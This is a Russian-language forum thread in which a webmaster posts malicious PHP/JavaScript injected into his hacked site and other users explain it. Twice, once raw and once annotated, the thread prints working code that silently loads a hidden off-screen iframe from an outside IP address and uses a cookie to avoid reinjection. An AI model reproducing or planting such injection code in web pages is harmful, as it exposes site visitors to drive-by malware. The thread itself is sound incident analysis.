Что делает этот вредоносный код?

Discussion in 'Защита ОС: антивирусы, фаерволы, антишпионы' started by Kirill.Y, 13 Aug 2013.

  1. Kirill.Y

    Kirill.Y New Member

    Joined:
    20 Nov 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Добрый день! На днях ломанули сайт, внедрив в него вредоносный код. Проблему со взломом, вроде как, решил, но интересно что делает код, который мне вешали?

    П.С. Может кто сталкивался с этой проблемой и знает как именно ломались сайты - воровство пасов к ФТП, взлом хостера, проникновение через уязвимости сайтов или как-то еще?

    Code:
    <?  #b44d55#                                                                                                                                                                                                                                                            echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          function llolwut() { var momge = document.createElement('iframe'); momge.src = 'http://69.67.187.39/TpqzKHZm.php'; momge.style.border='0'; momge.style.position='absolute'; momge.style.left='-1234px'; momge.style.top='-1337px'; momge.style.height='21px'; momge.style.width='21px'; if (!document.getElementById('momge')) { document.write('<div name=\'momge\' id=\'momge\'></div>'); document.getElementById('momge').appendChild(momge); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today=new Date(); var expire=new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 1800000*24*nDays); document.cookie=cookieName+\"=\"+escape(cookieValue) + \";expires=\" + expire.toGMTString() + ((path) ? \"; path=\" + path : \"\");}function GetCookie(name) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ((!start) && (name != document.cookie.substring(0,name.length))) {  return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled) { if(GetCookie('___utma')=='84f5e86989f374536450659c18f5489e'){}else{SetCookie('___utma', '84f5e86989f374536450659c18f5489e', '1', '/'); llolwut();}}</script>";    #/b44d55#  ?>
     
  2. H3L1X

    H3L1X Active Member

    Joined:
    10 Apr 2012
    Messages:
    632
    Likes Received:
    215
    Reputations:
    170
    Могу ошибаться, если так - поправьте, но на мой взгляд, это - сниффер, пущеный через XSS.

    На мысль натолкнул вот этот пост: https://forum.antichat.ru/showpost.php?p=314897&postcount=7
     
  3. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,434
    Reputations:
    377
    JS iframe Вам запилили вот на этот ресурс: "http://69.67.187.39/TpqzKHZm.php"
    А что ифрэйм с этого ресурса грузил посетителям вашего сайта ХЗ. Судя по гуглу этот ифрэйм Украину особо любит.
     
    _________________________
  4. Kirill.Y

    Kirill.Y New Member

    Joined:
    20 Nov 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Спасибо, что натолкнули на мысль. Учитывая, что FTP был обычным. а не FTPS, вполне возможно, что висел снифер.
     
  5. dobrenkij

    dobrenkij Banned

    Joined:
    4 Aug 2013
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    это подгруз связки или другого дерьма
     
  6. ForcePush

    ForcePush New Member

    Joined:
    14 Jul 2013
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Как-то так:

    Code:
    <script type="text/javascript" language="javascript"> // весь следующий код внедряется в страницу
    
    function llolwut()  // функция, создающая невидимый iframe - http://69.67.187.39/TpqzKHZm.php
    {
    	var momge = document.createElement('iframe');
    	
    	momge.src = 'http://69.67.187.39/TpqzKHZm.php';
    	momge.style.border= '0';
    	momge.style.position = 'absolute';
    	momge.style.left = '-1234px';
    	momge.style.top = '-1337px';
    	momge.style.height = '21px';
    	momge.style.width = '21px';
    	
    	if ( !document.getElementById( 'momge' ) ) // если еще не сделали iframe
    	{
    		document.write('<div name=\'momge\' id=\'momge\'></div>');
    		document.getElementById('momge').appendChild(momge ); // сделать его
    	}
    }
    
    function SetCookie( cookieName, cookieValue, nDays, path ) // установить кукисы
    {
    	var today=new Date();
    	var expire=new Date();
    	
    	if ( nDays==null || nDays==0 )
    		nDays=1;
    		
    	expire.setTime(today.getTime() + 1800000*24*nDays);
    	document.cookie = cookieName + "=" + escape( cookieValue ) + ";expires=" + expire.toGMTString() + ( (path) ? ";path = " + path : "");
    }
    
    function GetCookie(name) // получить кукисы
    {
    	var start = document.cookie.indexOf( name + "=" );
    	var len = start + name.length + 1;
    	
    	if ( (!start) && ( name != document.cookie.substring( 0,name.length ) ) )
    		return null;
    	
    	if ( start == -1 )
    		return null;
    		
    	var end = document.cookie.indexOf( ";", len );
    	
    	if ( end == -1 )
    		end = document.cookie.length;
    		
    	return unescape( document.cookie.substring( len, end ) );
    }
    
    // основной код
    
    if ( navigator.cookieEnabled ) // если кукисы включены в настройках
    {
    	if( GetCookie( '___utma' ) == '84f5e86989f374536450659c18f5489e' ) {} // если проставлены вредные кукисы - ничего не делать
    	else // если не проставлены - установить их и внедрить невидимый iframe в код страницы
    	{
    		SetCookie( '___utma', '84f5e86989f374536450659c18f5489e', '1', '/' );
    		llolwut();
    	}
    }
    </script>
    
     
    #6 ForcePush, 14 Aug 2013
    Last edited: 14 Aug 2013
  7. Kirill.Y

    Kirill.Y New Member

    Joined:
    20 Nov 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Один мой знакомый склоняется к мысли, что код служит для генерации траффа.
     
  8. Kirill.Y

    Kirill.Y New Member

    Joined:
    20 Nov 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Спасибо за пояснения к коду